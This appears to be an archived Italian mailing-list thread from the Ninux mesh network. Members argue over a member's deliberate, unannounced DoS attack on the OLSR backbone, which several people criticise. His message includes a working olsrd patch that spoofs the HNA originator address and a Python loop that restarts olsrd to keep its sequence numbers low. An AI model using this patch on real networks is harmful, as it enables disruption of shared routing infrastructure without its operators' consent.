quindo oltre al culo per sistemare pura la presa per il culo a fare la
caccia alle streghe di un danno provocato senza avviso.

No grazie se devo bestemmiare allora bestemmio e questo non è relax ma
danno provocato e torno a ripetere che un provvedimento simbolico va preso.
Non mi curo che sia ZioProto o qualsiasi altro ma che sia di esempio.

Se per voi questa è ninux allora non utilizzate i servizi che non approvate
e fate un passo indietro.




Il giorno 25 maggio 2014 12:16, Alessandro (aka ArkaNet) 
arkant...@gmail.com ha scritto:

 Hola!

 Fish hai ragione dobbiamo fare qualcosa!!
 Sicuramente ZioProTo ci sta facendo capire quanto sia semplice per un
 macellaio utilizzare un coltello.
 Cosa dovremmo aver acquisito alla luce di ciò?
 Che se arrivasse un assassino e si impadronisse del coltello, farebbe una
 strage!

 Ora, senza troppe metafore, ci siamo resi conto che se qualcuno ha voglia
 (e capacità) può farci male.
 I provvedimenti dobbiamo prenderli per evitare minacce *esterne*, e che
 sicuramente non avvisino prima di agire!
 Dire che Saverio sia una minaccia sarebbe come entrare in chiesa e
 bestemmiare, insomma ... non si fa ;)

 Se vogliamo una rete 'pronta' e con una certa resilienza, dobbiamo
 costruircela. A volte non basta fare il link migliore per poter dire di
 avere una struttura solida.
 Abbiamo anche bisogno di un motore che spinga!

 E poi ricordiamoci che ninux fa rima con relax!

 Io direi fortuna che era un'azione controllata! (e fatta apposta per
 essere controllabile)

 Bella  Buona Domenica @tutti

 *--
 Arka*



 Il giorno 25 maggio 2014 09:37, Andrea Pescetelli 
 andrea.pescete...@gmail.com ha scritto:

 Ciao
 Vorrei chiedere di prendere provvedimenti seri a seguito di questi eventi
 e comportamenti che da una settimana stanno invalidando sia il rispetto
 reciproco sia il buon finzionamento della rete stessa da parte di Saverio
 Proto.
 Il 25/mag/2014 09:07 Alessandro Gnagni alessan...@gnagni.it ha
 scritto:

  Non è qualche ora. Va avanti da giovedì mattina.
 Ma almeno avvisare? Uno non può perdere tempo appresso a ste cose...
 Jabber è stato ko da giovedì per sta cosa.
 Il 25/mag/2014 01:03 Saverio Proto ziopr...@gmail.com ha scritto:

 Ciao,

 Metto in Cc: anche wireless@ml.ninux.org perché questa email contiene
 informazioni tecniche interessanti.

 bravi, avete risolto il problema in fretta :) Ho volutamente provato
 un attacco DoS sul backbone per capire che effetto poteva avere.

 ecco la patch di olsrd con cui generavo l'attacco DoS

 diff --git a/src/build_msg.c b/src/build_msg.c
 index 109f955..e252981 100644
 --- a/src/build_msg.c
 +++ b/src/build_msg.c
 @@ -1021,7 +1021,11 @@ serialize_hna4(struct interface *ifp)
m = (union olsr_message *)msg_buffer;

/* Fill header */
 -  m-v4.originator = olsr_cnf-main_addr.v4.s_addr;
 +  struct in_addr fakesource;
 +  fakesource.s_addr = 0;
 +  //inet_hton(2956867021,fakesource);
 +  inet_aton(172.16.40.40,fakesource);
 +  m-v4.originator = fakesource.s_addr;
m-v4.hopcnt = 0;
m-v4.ttl = MAX_TTL;
m-v4.olsr_msgtype = HNA_MESSAGE;


 una domanda,

 se avessi patchato anche:

 m-v4.hopcnt = XXX

 mettendo numeri casuali..

 sarebbe stato altrettanto facile capire chi è che iniettava questi
 messaggi ?

 mi sto divertendo parecchio con questi attacchi DoS, sono molto
 istruttivi. Per chi vuole giocare insieme a me a programmare in C
 possiamo approfondire il giovedi sera al Sans Papiers. (Il prossimo
 che vorrei provare è DrDoS su snmp).

 un problema di questo attacco sono cmq i sequence number. Per rendere
 l'attacco efficace ho dovuto far andare la mia instanza patchata di
 OLSR a singhiozzo:

 import os
 import time

 while True:
 os.system(olsrd)
 print started\n
 time.sleep(120)
 os.system(killall olsrd)
 print killed\n
 time.sleep(300)

 in quanto avevo bisogno che i miei sequence number dovevano sempre
 essere piu bassi di quelli del spoofato, altrimenti venivano scartati
 come out of sequence.

 vi va di scrivere insieme un articoletto per il blog ? Io scrivo la
 parte di come ti costruisce l'attacco e voi la parte di come avete
 fatto ad identificare il nodo spoofato ?

 ho staccatto il nodo attaccante, il gioco è finito :)

 ah... vi prego nessun malumore per qualche oretta di disservizi, this
 is Ninux. Si fanno queste 

Re: [Ninux-Wireless] [ninux-roma] Attacchi DoS in olsrd Was: Malfunzionamento a Gallia

2014-05-25 Per discussione Andrea Pescetelli
Arka Buona Domenica anche a te
Perdona la dimenticanza.
Il 25/mag/2014 12:27 Andrea Pescetelli andrea.pescete...@gmail.com ha
scritto:

 Non è sminuendo la cosa che si risolve il problema.
 Dove andare a colpire in un azione premeditata?
 I servizi di tutti perchè ZioProto se ne frega della chat dove gli altri
 fanno gsoc e scambiano opinioni.
 Dove? Nella Farm che lui stesso non approva e guarda caso dove ci sta
 anche casa mia dove forse per qualche motivo in un futuro avrebbe potuto
 girarci anche il blog che gyardacaso non approva.
 Quale subnet? La pubbica della farm e perchè non quella dove ci sta anche
 il mail server di Nino?
 Quale target? Una macchina guarda caso di casa al mare di Pierluigi che
 abbiamo sostituito giovedi' insieme ad altre 3 perchè seccate da un fulmine
 quindo oltre al culo per sistemare pura la presa per il culo a fare la
 caccia alle streghe di un danno provocato senza avviso.

 No grazie se devo bestemmiare allora bestemmio e questo non è relax ma
 danno provocato e torno a ripetere che un provvedimento simbolico va preso.
 Non mi curo che sia ZioProto o qualsiasi altro ma che sia di esempio.

 Se per voi questa è ninux allora non utilizzate i servizi che non
 approvate e fate un passo indietro.




 Il giorno 25 maggio 2014 12:16, Alessandro (aka ArkaNet) 
 arkant...@gmail.com ha scritto:

 Hola!

 Fish hai ragione dobbiamo fare qualcosa!!
 Sicuramente ZioProTo ci sta facendo capire quanto sia semplice per un
 macellaio utilizzare un coltello.
 Cosa dovremmo aver acquisito alla luce di ciò?
 Che se arrivasse un assassino e si impadronisse del coltello, farebbe una
 strage!

 Ora, senza troppe metafore, ci siamo resi conto che se qualcuno ha voglia
 (e capacità) può farci male.
  I provvedimenti dobbiamo prenderli per evitare minacce *esterne*, e che
 sicuramente non avvisino prima di agire!
 Dire che Saverio sia una minaccia sarebbe come entrare in chiesa e
 bestemmiare, insomma ... non si fa ;)

 Se vogliamo una rete 'pronta' e con una certa resilienza, dobbiamo
 costruircela. A volte non basta fare il link migliore per poter dire di
 avere una struttura solida.
 Abbiamo anche bisogno di un motore che spinga!

 E poi ricordiamoci che ninux fa rima con relax!

 Io direi fortuna che era un'azione controllata! (e fatta apposta per
 essere controllabile)

 Bella  Buona Domenica @tutti

 *--
 Arka*



 Il giorno 25 maggio 2014 09:37, Andrea Pescetelli 
 andrea.pescete...@gmail.com ha scritto:

 Ciao
 Vorrei chiedere di prendere provvedimenti seri a seguito di questi
 eventi e comportamenti che da una settimana stanno invalidando sia il
 rispetto reciproco sia il buon finzionamento della rete stessa da parte di
 Saverio Proto.
 Il 25/mag/2014 09:07 Alessandro Gnagni alessan...@gnagni.it ha
 scritto:

  Non è qualche ora. Va avanti da giovedì mattina.
 Ma almeno avvisare? Uno non può perdere tempo appresso a ste cose...
 Jabber è stato ko da giovedì per sta cosa.
 Il 25/mag/2014 01:03 Saverio Proto ziopr...@gmail.com ha scritto:

 Ciao,

 Metto in Cc: anche wireless@ml.ninux.org perché questa email contiene
 informazioni tecniche interessanti.

 bravi, avete risolto il problema in fretta :) Ho volutamente provato
 un attacco DoS sul backbone per capire che effetto poteva avere.

 ecco la patch di olsrd con cui generavo l'attacco DoS

 diff --git a/src/build_msg.c b/src/build_msg.c
 index 109f955..e252981 100644
 --- a/src/build_msg.c
 +++ b/src/build_msg.c
 @@ -1021,7 +1021,11 @@ serialize_hna4(struct interface *ifp)
m = (union olsr_message *)msg_buffer;

/* Fill header */
 -  m-v4.originator = olsr_cnf-main_addr.v4.s_addr;
 +  struct in_addr fakesource;
 +  fakesource.s_addr = 0;
 +  //inet_hton(2956867021,fakesource);
 +  inet_aton(172.16.40.40,fakesource);
 +  m-v4.originator = fakesource.s_addr;
m-v4.hopcnt = 0;
m-v4.ttl = MAX_TTL;
m-v4.olsr_msgtype = HNA_MESSAGE;


 una domanda,

 se avessi patchato anche:

 m-v4.hopcnt = XXX

 mettendo numeri casuali..

 sarebbe stato altrettanto facile capire chi è che iniettava questi
 messaggi ?

 mi sto divertendo parecchio con questi attacchi DoS, sono molto
 istruttivi. Per chi vuole giocare insieme a me a programmare in C
 possiamo approfondire il giovedi sera al Sans Papiers. (Il prossimo
 che vorrei provare è DrDoS su snmp).

 un problema di questo attacco sono cmq i sequence number. Per rendere
 l'attacco efficace ho dovuto far andare la mia instanza patchata di
 OLSR a singhiozzo:

 import os
 import time

 while True:
 os.system(olsrd)
 print started\n
 time.sleep(120)
 os.system(killall olsrd)
 print killed\n
 time.sleep(300)

 in quanto avevo bisogno che i miei sequence number dovevano sempre
 essere piu bassi di quelli del spoofato, altrimenti venivano scartati
 come out of sequence.

 vi va di scrivere insieme un articoletto per il blog ? Io scrivo la
 parte di come ti costruisce l'attacco e voi la parte di come avete
 fatto ad identificare il nodo spoofato 

Re: [Ninux-Wireless] [ninux-roma] Attacchi DoS in olsrd Was: Malfunzionamento a Gallia

2014-05-25 Per discussione Alessandro (aka ArkaNet)
Perdona(te) il replay ma è doveroso...

1) che si approvi o meno, la farm è la meta che si prefiggerebbe chiunque
in un 'attacco' simile
2) i servizi sono come il miele per api ed orsi, ergo vedi 1)
3) avrei scelto anche io l'indirizzo di una macchina ancora non esistente
né sul mapserver né sul wiki

Detto ciò non avere fretta di sentirti tu il diretto interessato
dell'attacco, solo perché tu hosti la farm, è la rete che deve *imparare* a
difendersi e come vedi abbiamo imparato anche un'altra cosa, ovvero che se
un servizio è centralizzato è più semplice da identificare ed attaccare

Quindi, sì Buona Domenica ;)

*--
Arka*



Il giorno 25 maggio 2014 12:27, Andrea Pescetelli 
andrea.pescete...@gmail.com ha scritto:

 Non è sminuendo la cosa che si risolve il problema.
 Dove andare a colpire in un azione premeditata?
 I servizi di tutti perchè ZioProto se ne frega della chat dove gli altri
 fanno gsoc e scambiano opinioni.
 Dove? Nella Farm che lui stesso non approva e guarda caso dove ci sta
 anche casa mia dove forse per qualche motivo in un futuro avrebbe potuto
 girarci anche il blog che gyardacaso non approva.
 Quale subnet? La pubbica della farm e perchè non quella dove ci sta anche
 il mail server di Nino?
 Quale target? Una macchina guarda caso di casa al mare di Pierluigi che
 abbiamo sostituito giovedi' insieme ad altre 3 perchè seccate da un fulmine
 quindo oltre al culo per sistemare pura la presa per il culo a fare la
 caccia alle streghe di un danno provocato senza avviso.

 No grazie se devo bestemmiare allora bestemmio e questo non è relax ma
 danno provocato e torno a ripetere che un provvedimento simbolico va preso.
 Non mi curo che sia ZioProto o qualsiasi altro ma che sia di esempio.

 Se per voi questa è ninux allora non utilizzate i servizi che non
 approvate e fate un passo indietro.




 Il giorno 25 maggio 2014 12:16, Alessandro (aka ArkaNet) 
 arkant...@gmail.com ha scritto:

 Hola!

 Fish hai ragione dobbiamo fare qualcosa!!
 Sicuramente ZioProTo ci sta facendo capire quanto sia semplice per un
 macellaio utilizzare un coltello.
 Cosa dovremmo aver acquisito alla luce di ciò?
 Che se arrivasse un assassino e si impadronisse del coltello, farebbe una
 strage!

 Ora, senza troppe metafore, ci siamo resi conto che se qualcuno ha voglia
 (e capacità) può farci male.
  I provvedimenti dobbiamo prenderli per evitare minacce *esterne*, e che
 sicuramente non avvisino prima di agire!
 Dire che Saverio sia una minaccia sarebbe come entrare in chiesa e
 bestemmiare, insomma ... non si fa ;)

 Se vogliamo una rete 'pronta' e con una certa resilienza, dobbiamo
 costruircela. A volte non basta fare il link migliore per poter dire di
 avere una struttura solida.
 Abbiamo anche bisogno di un motore che spinga!

 E poi ricordiamoci che ninux fa rima con relax!

 Io direi fortuna che era un'azione controllata! (e fatta apposta per
 essere controllabile)

 Bella  Buona Domenica @tutti

 *--
 Arka*



 Il giorno 25 maggio 2014 09:37, Andrea Pescetelli 
 andrea.pescete...@gmail.com ha scritto:

 Ciao
 Vorrei chiedere di prendere provvedimenti seri a seguito di questi
 eventi e comportamenti che da una settimana stanno invalidando sia il
 rispetto reciproco sia il buon finzionamento della rete stessa da parte di
 Saverio Proto.
 Il 25/mag/2014 09:07 Alessandro Gnagni alessan...@gnagni.it ha
 scritto:

  Non è qualche ora. Va avanti da giovedì mattina.
 Ma almeno avvisare? Uno non può perdere tempo appresso a ste cose...
 Jabber è stato ko da giovedì per sta cosa.
 Il 25/mag/2014 01:03 Saverio Proto ziopr...@gmail.com ha scritto:

 Ciao,

 Metto in Cc: anche wireless@ml.ninux.org perché questa email contiene
 informazioni tecniche interessanti.

 bravi, avete risolto il problema in fretta :) Ho volutamente provato
 un attacco DoS sul backbone per capire che effetto poteva avere.

 ecco la patch di olsrd con cui generavo l'attacco DoS

 diff --git a/src/build_msg.c b/src/build_msg.c
 index 109f955..e252981 100644
 --- a/src/build_msg.c
 +++ b/src/build_msg.c
 @@ -1021,7 +1021,11 @@ serialize_hna4(struct interface *ifp)
m = (union olsr_message *)msg_buffer;

/* Fill header */
 -  m-v4.originator = olsr_cnf-main_addr.v4.s_addr;
 +  struct in_addr fakesource;
 +  fakesource.s_addr = 0;
 +  //inet_hton(2956867021,fakesource);
 +  inet_aton(172.16.40.40,fakesource);
 +  m-v4.originator = fakesource.s_addr;
m-v4.hopcnt = 0;
m-v4.ttl = MAX_TTL;
m-v4.olsr_msgtype = HNA_MESSAGE;


 una domanda,

 se avessi patchato anche:

 m-v4.hopcnt = XXX

 mettendo numeri casuali..

 sarebbe stato altrettanto facile capire chi è che iniettava questi
 messaggi ?

 mi sto divertendo parecchio con questi attacchi DoS, sono molto
 istruttivi. Per chi vuole giocare insieme a me a programmare in C
 possiamo approfondire il giovedi sera al Sans Papiers. (Il prossimo
 che vorrei provare è DrDoS su snmp).

 un problema di questo attacco sono cmq i sequence number. Per rendere
 l'attacco efficace ho dovuto far 

Re: [Ninux-Wireless] [ninux-roma] Attacchi DoS in olsrd Was: Malfunzionamento a Gallia

2014-05-25 Per discussione Andrea Pescetelli
Stai sbagliando perche' la macchina 172.16.40.40 esisteva
Per cessare l'attacco e' stata passata a 172.16.40.43 avvisando i
propietari preventivamente.
Quindi essendo male informato anche le tue conclusioni restano affrettate.

Penso di aver concluso.
Il 25/mag/2014 13:32 Alessandro (aka ArkaNet) arkant...@gmail.com ha
scritto:

 Perdona(te) il replay ma è doveroso...

 1) che si approvi o meno, la farm è la meta che si prefiggerebbe chiunque
 in un 'attacco' simile
 2) i servizi sono come il miele per api ed orsi, ergo vedi 1)
 3) avrei scelto anche io l'indirizzo di una macchina ancora non esistente
 né sul mapserver né sul wiki

 Detto ciò non avere fretta di sentirti tu il diretto interessato
 dell'attacco, solo perché tu hosti la farm, è la rete che deve *imparare* a
 difendersi e come vedi abbiamo imparato anche un'altra cosa, ovvero che se
 un servizio è centralizzato è più semplice da identificare ed attaccare

 Quindi, sì Buona Domenica ;)

 *--
 Arka*



 Il giorno 25 maggio 2014 12:27, Andrea Pescetelli 
 andrea.pescete...@gmail.com ha scritto:

 Non è sminuendo la cosa che si risolve il problema.
 Dove andare a colpire in un azione premeditata?
 I servizi di tutti perchè ZioProto se ne frega della chat dove gli altri
 fanno gsoc e scambiano opinioni.
 Dove? Nella Farm che lui stesso non approva e guarda caso dove ci sta
 anche casa mia dove forse per qualche motivo in un futuro avrebbe potuto
 girarci anche il blog che gyardacaso non approva.
 Quale subnet? La pubbica della farm e perchè non quella dove ci sta anche
 il mail server di Nino?
 Quale target? Una macchina guarda caso di casa al mare di Pierluigi che
 abbiamo sostituito giovedi' insieme ad altre 3 perchè seccate da un fulmine
 quindo oltre al culo per sistemare pura la presa per il culo a fare la
 caccia alle streghe di un danno provocato senza avviso.

 No grazie se devo bestemmiare allora bestemmio e questo non è relax ma
 danno provocato e torno a ripetere che un provvedimento simbolico va preso.
 Non mi curo che sia ZioProto o qualsiasi altro ma che sia di esempio.

 Se per voi questa è ninux allora non utilizzate i servizi che non
 approvate e fate un passo indietro.




 Il giorno 25 maggio 2014 12:16, Alessandro (aka ArkaNet) 
 arkant...@gmail.com ha scritto:

 Hola!

 Fish hai ragione dobbiamo fare qualcosa!!
 Sicuramente ZioProTo ci sta facendo capire quanto sia semplice per un
 macellaio utilizzare un coltello.
 Cosa dovremmo aver acquisito alla luce di ciò?
 Che se arrivasse un assassino e si impadronisse del coltello, farebbe
 una strage!

 Ora, senza troppe metafore, ci siamo resi conto che se qualcuno ha
 voglia (e capacità) può farci male.
  I provvedimenti dobbiamo prenderli per evitare minacce *esterne*, e che
 sicuramente non avvisino prima di agire!
 Dire che Saverio sia una minaccia sarebbe come entrare in chiesa e
 bestemmiare, insomma ... non si fa ;)

 Se vogliamo una rete 'pronta' e con una certa resilienza, dobbiamo
 costruircela. A volte non basta fare il link migliore per poter dire di
 avere una struttura solida.
 Abbiamo anche bisogno di un motore che spinga!

 E poi ricordiamoci che ninux fa rima con relax!

 Io direi fortuna che era un'azione controllata! (e fatta apposta per
 essere controllabile)

 Bella  Buona Domenica @tutti

 *--
 Arka*



 Il giorno 25 maggio 2014 09:37, Andrea Pescetelli 
 andrea.pescete...@gmail.com ha scritto:

 Ciao
 Vorrei chiedere di prendere provvedimenti seri a seguito di questi
 eventi e comportamenti che da una settimana stanno invalidando sia il
 rispetto reciproco sia il buon finzionamento della rete stessa da parte di
 Saverio Proto.
 Il 25/mag/2014 09:07 Alessandro Gnagni alessan...@gnagni.it ha
 scritto:

  Non è qualche ora. Va avanti da giovedì mattina.
 Ma almeno avvisare? Uno non può perdere tempo appresso a ste cose...
 Jabber è stato ko da giovedì per sta cosa.
 Il 25/mag/2014 01:03 Saverio Proto ziopr...@gmail.com ha scritto:

 Ciao,

 Metto in Cc: anche wireless@ml.ninux.org perché questa email contiene
 informazioni tecniche interessanti.

 bravi, avete risolto il problema in fretta :) Ho volutamente provato
 un attacco DoS sul backbone per capire che effetto poteva avere.

 ecco la patch di olsrd con cui generavo l'attacco DoS

 diff --git a/src/build_msg.c b/src/build_msg.c
 index 109f955..e252981 100644
 --- a/src/build_msg.c
 +++ b/src/build_msg.c
 @@ -1021,7 +1021,11 @@ serialize_hna4(struct interface *ifp)
m = (union olsr_message *)msg_buffer;

/* Fill header */
 -  m-v4.originator = olsr_cnf-main_addr.v4.s_addr;
 +  struct in_addr fakesource;
 +  fakesource.s_addr = 0;
 +  //inet_hton(2956867021,fakesource);
 +  inet_aton(172.16.40.40,fakesource);
 +  m-v4.originator = fakesource.s_addr;
m-v4.hopcnt = 0;
m-v4.ttl = MAX_TTL;
m-v4.olsr_msgtype = HNA_MESSAGE;


 una domanda,

 se avessi patchato anche:

 m-v4.hopcnt = XXX

 mettendo numeri casuali..

 sarebbe stato altrettanto facile capire chi è che iniettava questi
 messaggi ?

 

Re: [Ninux-Wireless] [ninux-roma] Attacchi DoS in olsrd Was: Malfunzionamento a Gallia

2014-05-25 Per discussione Saverio Proto
Il 25 maggio 2014 10:13, Netsoul hackerrede...@outlook.com ha scritto:

 Una volta queste cose venivano organizzate. Certo, il gestore non doveva 
 conoscere la metodologia, ma almeno l'arco  temporale in cui si sarebbero 
 svolti i pentest. Almeno a me così hanno insegnato. Farlo al buio  e poi 
 vantarsi di
  averlo deliberatamente fatto vuol dire aver  mettesso in difficoltà
persone che magari proprio in quell'arco temporale
 avevano bisogno della rete o più semplicemente stavano cercando di risolvere 
 piccoli bug (che poi non capisci se è stato il tuo bug a fottere la rete o 
 la rete che fotte te)
 Boh, forse sbaglio io eh! Ma ai miei tempi  se volevi fare una cosa fatta 
 bene e professionale avvisavi e poi postavi l'eventuale dump a beneficio di 
 tutti...

Ciao Netsoul,

il tuo nick mi è nuovo, quindi prima di tutto piacere di conoscerti.

le tue osservazioni sono corrette, ma io non volevo solo fare un
esperimento tecnico, ma un esperimento community.

Ero ti spiego perché farlo al buio.


Parte tecnica:
abbiamo capito che con una patch da 4 righe si può fare un attacco DoS
che funziona.
abbiamo capito che se il TTL non è forgiato possiamo capire a quanti
hop da noi è l'attaccante, e provare a identificarlo.

Parte community:
fino alla risoluzione del problema non è girata nemmeno una email su
lista wireless o nodi-roma. C'è quindi un gruppetto che lavora per
fatti suoi. Un gruppetto chiuso. Questo è una male per la community.
Non vengono coinvolte tutte le persone nelle cose tecniche ma solo gli
amichetti.

solo alla soluzione del problema è stato a questo punto scritto su
nodi-roma, ma perché? tanto valeva scrivere a me ? E' stato scritto
perché si doveva additare il cattivo. A quel punto tanta gente
simpatizzante di Andrea e con poche competenza tecnica ha rincarato la
dose attaccando il cattivo. Si è arrivati a richiedere una punizione
con per il cattivo. Ci vorrebbe qualcuno con piu competenze di me in
psicologia per analizzare in fenomeno.

La parte tecnica è andata totamente in secondo piano. Non sono stati
dati dettagli di come è stato trovato l'attaccante. Non sono state
date risposte alle domande tecniche fatte. Io avevo lanciato degli
inviti interessati come l'articolo sul blog ma non mi è stato dato
alcun seguito.

era proprio questo tipo di esperimento che volevo fare !
questa community ha bisogno di una cura :)

ciao,

Saverio
___
Wireless mailing list
Wireless@ml.ninux.org
http://ml.ninux.org/mailman/listinfo/wireless


Re: [Ninux-Wireless] [ninux-roma] Attacchi DoS in olsrd Was: Malfunzionamento a Gallia

2014-05-25 Per discussione Edoardo Mazzaracchio
Ok, quindi a rigor di logica se voglio verificare la fragilità delle ossa
di qualcuno gliele rompo e poi gli dico hey, visto? Sei vulnerabile!
Ringraziami, ora lo sai! E dai, non prendertela per un paio di mesi di
clauticanza

Abbiamo già detto che queste cose si possono verificare in sicuri ambienti
di test senza recar fastidi, volete fare il test nel caso reale? Fatelo in
un vostro gruppo di macchine, Ninux non è il playground di pochi ma è la
rete di tutti i partecipanti. E siccome è evidente che ci sono diverse
visioni sulla rete, ognuno dovrebbe rispettare quella altrui. Se dovessi
fare come Saverio rimetterei AirMax pure sulla bullet e taglierei fuori
Pellegri e lui, invece no, rispetto (sentendomi un coglione, a questo
punto) la loro scelta di OpenWRT e gli lascio la loro antenna dedicata, ah
a proposito abbiamo anche migliorato i link due settimane fa (doppiamente
coglione). A questo punto ditelo apertamente, dobbiamo fare ognuno come
cazzo gli pare?

Nella bellissima riunione di giovedì scorso, con tanti ninuxiani vecchi e
nuovi, si respirava un'aria di gente che ha voglia di fare, tutti a
sorridere, nessuno che faceva il cagacazzi, poi ti trovi queste situazioni
e ti passa la voglia.

Ma che vi costa a voi penetration tester fare i test senza rompere i
coglioni al prossimo?

E pensare che basterebbe dire ho verificato in casa questa falla, vorrei
fare un test sul caso reale per dare quantomeno un aspetto di serietà e
magari pure dei ringraziamenti, invece no, si preferisce provocare e
prendere gli insulti, io non lo so come ragionate.

Alla prossima decisionale se ne parlerà a lungo e vedremo che ne verrà
fuori. Spero si prenderà una linea guida ben definita per non dover più
assistere a malumori.
Il 25/mag/2014 13:32 Alessandro (aka ArkaNet) arkant...@gmail.com ha
scritto:

 Perdona(te) il replay ma è doveroso...

 1) che si approvi o meno, la farm è la meta che si prefiggerebbe chiunque
 in un 'attacco' simile
 2) i servizi sono come il miele per api ed orsi, ergo vedi 1)
 3) avrei scelto anche io l'indirizzo di una macchina ancora non esistente
 né sul mapserver né sul wiki

 Detto ciò non avere fretta di sentirti tu il diretto interessato
 dell'attacco, solo perché tu hosti la farm, è la rete che deve *imparare* a
 difendersi e come vedi abbiamo imparato anche un'altra cosa, ovvero che se
 un servizio è centralizzato è più semplice da identificare ed attaccare

 Quindi, sì Buona Domenica ;)

 *--
 Arka*



 Il giorno 25 maggio 2014 12:27, Andrea Pescetelli 
 andrea.pescete...@gmail.com ha scritto:

 Non è sminuendo la cosa che si risolve il problema.
 Dove andare a colpire in un azione premeditata?
 I servizi di tutti perchè ZioProto se ne frega della chat dove gli altri
 fanno gsoc e scambiano opinioni.
 Dove? Nella Farm che lui stesso non approva e guarda caso dove ci sta
 anche casa mia dove forse per qualche motivo in un futuro avrebbe potuto
 girarci anche il blog che gyardacaso non approva.
 Quale subnet? La pubbica della farm e perchè non quella dove ci sta anche
 il mail server di Nino?
 Quale target? Una macchina guarda caso di casa al mare di Pierluigi che
 abbiamo sostituito giovedi' insieme ad altre 3 perchè seccate da un fulmine
 quindo oltre al culo per sistemare pura la presa per il culo a fare la
 caccia alle streghe di un danno provocato senza avviso.

 No grazie se devo bestemmiare allora bestemmio e questo non è relax ma
 danno provocato e torno a ripetere che un provvedimento simbolico va preso.
 Non mi curo che sia ZioProto o qualsiasi altro ma che sia di esempio.

 Se per voi questa è ninux allora non utilizzate i servizi che non
 approvate e fate un passo indietro.




 Il giorno 25 maggio 2014 12:16, Alessandro (aka ArkaNet) 
 arkant...@gmail.com ha scritto:

 Hola!

 Fish hai ragione dobbiamo fare qualcosa!!
 Sicuramente ZioProTo ci sta facendo capire quanto sia semplice per un
 macellaio utilizzare un coltello.
 Cosa dovremmo aver acquisito alla luce di ciò?
 Che se arrivasse un assassino e si impadronisse del coltello, farebbe
 una strage!

 Ora, senza troppe metafore, ci siamo resi conto che se qualcuno ha
 voglia (e capacità) può farci male.
  I provvedimenti dobbiamo prenderli per evitare minacce *esterne*, e che
 sicuramente non avvisino prima di agire!
 Dire che Saverio sia una minaccia sarebbe come entrare in chiesa e
 bestemmiare, insomma ... non si fa ;)

 Se vogliamo una rete 'pronta' e con una certa resilienza, dobbiamo
 costruircela. A volte non basta fare il link migliore per poter dire di
 avere una struttura solida.
 Abbiamo anche bisogno di un motore che spinga!

 E poi ricordiamoci che ninux fa rima con relax!

 Io direi fortuna che era un'azione controllata! (e fatta apposta per
 essere controllabile)

 Bella  Buona Domenica @tutti

 *--
 Arka*



 Il giorno 25 maggio 2014 09:37, Andrea Pescetelli 
 andrea.pescete...@gmail.com ha scritto:

 Ciao
 Vorrei chiedere di prendere provvedimenti seri a seguito di questi
 eventi e comportamenti che da una 

Re: [Ninux-Wireless] [ninux-roma] Attacchi DoS in olsrd Was: Malfunzionamento a Gallia

2014-05-25 Per discussione NetSoul
Bentrovato anche a te,
per fortuna il mio nick ha avuto il beneficio del “diritto all’oblio” .. l’ho 
rispolverato da poco dopo anni di inattività. In verità sono passato giovedì 
scorso al Fuso, proprio per salutare tutti e per iniziare ad imparare qualcosa 
da voi.
Detto questo non discuto assolutamente sulla utilità della cosa ma solo sulla 
modalità di esecuzione.
Se posso esprimere una mia opinione personale, citandoti:

C'è quindi un gruppetto che lavora per fatti suoi. Un gruppetto chiuso.”

Ok, sarà pure. Ma nemmeno tu in questo caso hai pensato di coinvolgere tutti 
con una mail del tipo “oh, ragazzi. Proviamo a fare un po’ di test sulla rete? 
Chi di voi vuole partecipare? Io vorrei fare delle prove il…. verso le…. “

Non entro poi nel merito delle dinamiche del gruppo perché non vi conosco così 
bene da potermi permettere di farlo, quindi la mia eccezione rimane solo sul 
campo tecnico dei test.
Ciao 
NetSoul

Premesso che non discuto sull’utilità della cosa ma solo sulla modalità. 
On 25/mag/2014, at 13:50, Saverio Proto ziopr...@gmail.com wrote:

 
 
 Ciao Netsoul,
 
 il tuo nick mi è nuovo, quindi prima di tutto piacere di conoscerti.
 
 le tue osservazioni sono corrette, ma io non volevo solo fare un
 esperimento tecnico, ma un esperimento community.
 
 Ero ti spiego perché farlo al buio.
 
 
 Parte tecnica:
 abbiamo capito che con una patch da 4 righe si può fare un attacco DoS
 che funziona.
 abbiamo capito che se il TTL non è forgiato possiamo capire a quanti
 hop da noi è l'attaccante, e provare a identificarlo.
 
 Parte community:
 fino alla risoluzione del problema non è girata nemmeno una email su
 lista wireless o nodi-roma. C'è quindi un gruppetto che lavora per
 fatti suoi. Un gruppetto chiuso. Questo è una male per la community.
 Non vengono coinvolte tutte le persone nelle cose tecniche ma solo gli
 amichetti.



signature.asc
Description: Message signed with OpenPGP using GPGMail
___
Wireless mailing list
Wireless@ml.ninux.org
http://ml.ninux.org/mailman/listinfo/wireless


Re: [Ninux-Wireless] [ninux-roma] Attacchi DoS in olsrd Was: Malfunzionamento a Gallia

2014-05-25 Per discussione Alessandro Gnagni
Va be save, hai sempre ragione tu.
All'inizio sembrava un problema di configurazioni da parte di pierluigi
sulle sue macchine.
Dopo aver appurato che era tutto ok ieri sera alle 9 mi sono messo a
cercare di analizzare la cosa a fondo.
Io posso spiegare benissimo come ho fatto, solo onestamente non mi fido più
di te.
Io avrei preferito che tu agissi con maggior chiarezza, cosa che tu chiedi
sempre agli altri.
Tanto ormai solo quello che fai tu è giusto... noi sbagliamo sempre.
Ma non riesci a fare le cose comunicando con gli altri? Siamo una
community, tu invece ti sei rintanato nel tuo antro a scrivere codice per
creare bug.
Lo sappiamo tutti che volendo olsr è attaccabbile in milioni di modi, ma
per questo tuo bug hai creato un problema, senza proporrere una soluzione.
Il 25/mag/2014 13:50 Saverio Proto ziopr...@gmail.com ha scritto:

 Il 25 maggio 2014 10:13, Netsoul hackerrede...@outlook.com ha scritto:
 
  Una volta queste cose venivano organizzate. Certo, il gestore non doveva
 conoscere la metodologia, ma almeno l'arco  temporale in cui si sarebbero
 svolti i pentest. Almeno a me così hanno insegnato. Farlo al buio  e poi
 vantarsi di
   averlo deliberatamente fatto vuol dire aver  mettesso in difficoltà
 persone che magari proprio in quell'arco temporale
  avevano bisogno della rete o più semplicemente stavano cercando di
 risolvere piccoli bug (che poi non capisci se è stato il tuo bug a fottere
 la rete o la rete che fotte te)
  Boh, forse sbaglio io eh! Ma ai miei tempi  se volevi fare una cosa
 fatta bene e professionale avvisavi e poi postavi l'eventuale dump a
 beneficio di tutti...

 Ciao Netsoul,

 il tuo nick mi è nuovo, quindi prima di tutto piacere di conoscerti.

 le tue osservazioni sono corrette, ma io non volevo solo fare un
 esperimento tecnico, ma un esperimento community.

 Ero ti spiego perché farlo al buio.


 Parte tecnica:
 abbiamo capito che con una patch da 4 righe si può fare un attacco DoS
 che funziona.
 abbiamo capito che se il TTL non è forgiato possiamo capire a quanti
